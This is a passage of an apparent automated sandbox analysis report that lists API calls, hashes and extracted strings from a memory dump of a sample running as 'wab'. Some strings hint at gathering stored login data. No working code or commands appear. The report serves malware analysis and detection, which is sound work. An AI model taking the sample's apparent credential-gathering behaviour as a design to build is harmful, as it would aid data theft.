                                                            • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                            • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                            • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040D8BD
                                                            • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                            • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                            • memset.MSVCRT ref: 0040D906
                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                            • String ID: sysdatetimepick32
                                                            • API String ID: 1028950076-4169760276
                                                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: -journal$-wal
                                                            • API String ID: 438689982-2894717839
                                                            • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                            • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Item$Dialog$MessageSend
                                                            • String ID:
                                                            • API String ID: 3975816621-0
                                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _wcsicmp.MSVCRT ref: 00444D09
                                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                                            • _wcsicmp.MSVCRT ref: 00444D33
                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp$wcslen$_memicmp
                                                            • String ID: .save$http://$https://$log profile$signIn
                                                            • API String ID: 1214746602-2708368587
                                                            • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                            • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                            • String ID:
                                                            • API String ID: 2313361498-0
                                                            • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                            • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                            • GetWindow.USER32(00000000), ref: 00405F80
                                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageRectSend$Client
                                                            • String ID:
                                                            • API String ID: 2047574939-0
                                                            • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                            • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                            • String ID:
                                                            • API String ID: 4218492932-0
                                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                            • memcpy.MSVCRT ref: 0044A8BF
                                                            • memcpy.MSVCRT ref: 0044A90C
                                                            • memcpy.MSVCRT ref: 0044A988
                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                            • memcpy.MSVCRT ref: 0044A9D8
                                                            • memcpy.MSVCRT ref: 0044AA19
                                                            • memcpy.MSVCRT ref: 0044AA4A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: gj
                                                            • API String ID: 438689982-4203073231
                                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                            • API String ID: 3510742995-2446657581
                                                            • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                            • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                            • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                            • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                            • memset.MSVCRT ref: 00405ABB
                                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                            • SetFocus.USER32(?), ref: 00405B76
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$FocusItemmemset
                                                            • String ID:
                                                            • API String ID: 4281309102-0
                                                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _snwprintfwcscat
                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                            • API String ID: 384018552-4153097237
                                                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                            • String ID: 0$6
                                                            • API String ID: 2029023288-3849865405
                                                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                            • memset.MSVCRT ref: 00405455
                                                            • memset.MSVCRT ref: 0040546C
                                                            • memset.MSVCRT ref: 00405483
                                                            • memcpy.MSVCRT ref: 00405498
                                                            • memcpy.MSVCRT ref: 004054AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy$ErrorLast
                                                            • String ID: 6$\
                                                            • API String ID: 404372293-1284684873
                                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                            • wcscpy.MSVCRT ref: 0040A107
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                            • String ID:
                                                            • API String ID: 1331804452-0
                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                            • String ID: advapi32.dll
                                                            • API String ID: 2012295524-4050573280
                                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                            • <%s>, xrefs: 004100A6
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$_snwprintf
                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                            • API String ID: 3473751417-2880344631
                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: wcscat$_snwprintfmemset
                                                            • String ID: %2.2X
                                                            • API String ID: 2521778956-791839006
                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _snwprintfwcscpy
                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                            • API String ID: 999028693-502967061
                                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memsetstrlen
                                                            • String ID:
                                                            • API String ID: 2350177629-0
                                                            • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                            • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                            • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                            • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                            • API String ID: 2221118986-1606337402
                                                            • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                            • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                            • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                            • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                            • String ID:
                                                            • API String ID: 265355444-0
                                                            • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                            • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                            • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                            • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                              • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                            • memset.MSVCRT ref: 0040C439
                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                            • memset.MSVCRT ref: 0040C4D0
                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                            • String ID:
                                                            • API String ID: 1973883786-0
                                                            • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                            • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 004116FF
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
